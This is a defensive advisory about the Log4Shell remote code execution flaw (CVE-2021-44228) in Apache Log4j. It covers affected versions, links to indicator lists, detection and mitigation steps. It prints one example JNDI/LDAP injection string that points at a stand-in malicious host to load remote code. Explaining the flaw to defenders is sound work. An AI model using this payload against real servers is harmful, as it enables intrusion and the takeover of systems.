On December 9, a critical remote code execution (RCE) vulnerability was recently reported in the Apache Log4j 2 logging package versions 2.14.1 and below.
Apache Log4j is the most popular Java logging library with over 400,000 downloads on its GitHub project. It is used by many companies worldwide, enabling logging in a broad set of popular applications.
Exploiting this vulnerability is simple and allows cyber attackers to control java-based web servers and launch remote code execution attacks.
The Log4j library is integrated into almost every internet service or application we are familiar with, such as Twitter, Amazon, Microsoft, Minecraft, and others.
Currently, most attacks focus on using cryptocurrency mining at the expense of the victims.
Indicators of Compromise (IoC)
The following links will provide more information on the new Indicators of Compromise that different threat actors are using to execute the vulnerability:
- https://github.com/NCSC-NL/log4shell
- https://github.com/curated-intel/Log4Shell-IOCs
- https://pastebin.com/QADArZXJ
The vulnerability has been designated as CVE-2021-44228 and has a CVSS score of 10 out of 10. The cyber attacker, to exploit it, requires the application to register a particular string, a series of characters. One example: ${jndi:ldap://sitio-malicious.com/exp}. On his Twitter profile, computer Security specialist Matthew Prince reports evidence that the exploit was available at least 9 days before its publication.
To date, many attackers are exploiting the Log4Shell vulnerability to carry out their attacks. They can, for example, install cryptocurrency miners on a server, turn the affected devices into a botnet, introduce some malware, or even take remote control of the affected systems.
How to Detect This Vulnerability
There are several ways to do this one of the easiest ones is to know the version of Log4j you have installed. The vulnerable ones range from 2.0-beta9 to 2.14.1.
In addition, on GitHub, we can find the steps to execute commands and detect if the vulnerability registered as CVE-2021-44228 is present or not. This Python-based scanner acts as a detector for the Log4Shell weaknesses.
How to Remedy This Vulnerability
Apache Software Foundation has issued a security advisory to fix a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. CISA recommends users and administrators review the Apache Log4j 2.15.0 announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.
Recommendations:
The recommendation is to validate with manufacturers which of the systems used may be vulnerable and how to patch it and update IPS Signatures or other Zero Day type tools to help detect related traffic or behavior. If it is not possible to immediately patch vulnerable instances, it can potentially be mitigated through the following steps:
- For >=2.10, set the system property log4j2.formatMsgNoLookups to true.
- For >=2.10, set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
- For versions 2.0-beta9 to 2.10.0, remove JndiLookup.class from the class path:zip -q -d log4j core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
- Limit outgoing traffic to the Internet only from the necessary ports.
For More Information You Can Review The Following Sources Associated With The News:
- https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/
- https://socradar.io/what-do-you-know-about-the-log4j-critical-vulnerability-and-what-can-we-do/#8-Are-There-Any-IOCs-that-the-SOC-Teams-Can-Use-to-Prevent-Exploitation-of-the-Vulnerability-on-Internet-Exposed-Servers
- https://www.larazon.es/tecnologia/20211212/emnq6z4rejgu5fsnerxwbfdesq.html?outputType=amp
- https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html
- https://kc.mcafee.com/corporate/index?page=content&id=KB95091
- https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk176865&partition=Basic&product=IPS
- https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability
- https://blog.segu-info.com.ar/2021/12/log4shell-vulnerabilidad-critica-con.html
- https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html